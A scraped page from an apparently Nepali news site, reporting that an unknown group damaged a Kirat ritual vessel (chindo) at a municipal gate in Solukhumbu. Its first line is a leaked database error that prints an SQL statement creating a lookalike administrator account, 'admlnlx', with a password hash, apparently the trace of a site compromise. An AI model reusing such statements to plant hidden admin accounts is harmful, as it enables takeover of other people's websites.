WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxRzRPTuaYk4NtxaNaZszDMTRjKwG01', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:47:10', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १९ असार, सोलुखुम्बु । सोलुखुम्बु जिल्लाको सोलुदुधकुन्ड नगरपालिका र थुलुङ दुधकोशी गाउँपालिकाको सिमानामा राखिएको चिण्डो अज्ञात समूहले भात्काएको छ । किरात समुदायको संस्कार संग जोडिएको चिण्डोमा क्षेती पुर्याएपछी चौतर्फी आलोचना सुरु भएको छ ।
थुलुङ दुधकोशी गाँपालिका प्रवेशद्धारामा निर्माण गरिएको गेटमा चिण्डो निर्माण गरि राखिएको हो । उक्त चिण्डोमा मंगलबार अज्ञात समूहले क्षेति पुर्याएको थुलुङदुधकोशी गाउँपालिका अध्यक्ष असिम राइले जानकारी दिनुभयो ।
चिण्डोमा कस्ले के उद्देश्यले क्षेति गरेको भन्ने केहि पनि खुलेको छैन । पारुहाङ र सुम्निमाले आदिकालमा पानी जमाउने भाँडाको रुपमा सर्वप्रथम चिण्डोकै प्रयोग गरेका बताईन्छ । अहिले किरातीहरु जन्मदेखि मृत्यसम्म संस्कारमा चिण्डोको प्रयोग गर्ने गर्दछन ।